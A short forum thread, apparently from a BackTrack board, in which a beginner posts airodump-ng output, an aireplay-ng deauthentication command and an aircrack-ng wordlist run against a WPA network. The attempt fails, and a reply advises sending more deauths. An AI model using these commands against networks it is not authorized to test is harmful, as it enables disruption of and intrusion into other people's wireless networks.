Results 1 to 3 of 3

Thread: No Valid WPA handshakes

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    22

    Default No Valid WPA handshakes

    Just got my AWUS036H!
    Running BT3 from USB on LattitudeD610.

    Results of airodump-ng window:

    CH 6 ][ Elapsed: 21 mins ][ 2010-04-10 20:10 ][ fixed channel wlan0: 5

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:1C:10:xx:xx:xx 51 100 11074 6136 21 6 54 WPA TKIP PSK xxxxxxxxx

    BSSID STATION PWR Rate Lost Packets Probes

    00:1C:10:xx:xx:xx 00:1E:4C:xx:xx:xx 35 54- 1 0 5998


    Results of airplay+aircrack:

    bt ~ # iwconfig wlan0 txpower 25

    bt ~ # aireplay-ng -0 1 -a 00:1C:10:xx:xx:xx -c 00:1E:4c:xx:xx:xx wlan0
    19:49:33 Sending 64 directed DeAuth. STMAC: [00:1E:4C:xx:xx:xx] [22|26 ACKs]

    bt ~ # iwconfig wlan0 txpower 5

    bt ~ # aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b 00:1C:10:xx:xx:xx psk*.cap
    Opening psk-01.cap
    Opening psk-02.cap
    Opening psk-03.cap
    Opening psk-04.cap
    No valid WPA handshakes found..
    Quitting aircrack-ng...

    bt ~ # iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    eth1 unassociated ESSID:off/any
    Mode:Managed Channel=0 Access Point: Not-Associated
    Bit Rate:0 kb/s Tx-Power=20 dBm Sensitivity=8/0
    Retry limit:7 RTS thr:off Fragment thr:off
    Encryption key:off
    Power Management:off
    Link Quality:0 Signal level:0 Noise level:0
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0

    wlan0 802.11b/g Mode:Monitor Channel=6 Bit Rate=6 Mb/s
    Tx-Power=5 dBm
    Retry:on Fragment thr:off
    Link Quality=90/100 Signal level=-195 dBm Noise level=-246 dBm
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0


    play says im getting back ACKs from the client, so I guess it might be deauthenticating.
    client must be "g" according to rate, so I tried the default play and then set:
    #iwconfig wlan0 rate 6 ; (still "g" and tried play again- no dice)
    Also, should there not be a line after the 4th .cap saying how many packets were read?

    any help is appreciated.

  2. #2
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default Re: No Valid WPA handshakes

    add more deauth ...................

    or try my autohs script or gui
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  3. #3
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    10

    Default Re: No Valid WPA handshakes

    LoLz "shamanvirtuel" I just love your sig'Giving Machine Guns To Monkeys Since 2006"

    That's hilarious!!!!!!!!!!!

Similar Threads

  1. No valid WPA handshakes found AND [ 0| 0 ACKs] WHY?
    By Primeraptor in forum Beginners Forum
    Replies: 6
    Last Post: 03-24-2010, 10:10 PM
  2. Replies: 5
    Last Post: 01-17-2010, 05:30 AM
  3. Wusb54gc doesn't seem to p/u handshakes?
    By CHARGER RT2 in forum OLD Newbie Area
    Replies: 4
    Last Post: 10-29-2008, 11:10 AM
  4. No Valid WPA Handshakes
    By baker73 in forum OLD Newbie Area
    Replies: 1
    Last Post: 09-17-2008, 02:14 AM
  5. I can t get handshakes on my network
    By hackproof in forum OLD Newbie Area
    Replies: 0
    Last Post: 01-05-2008, 01:29 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •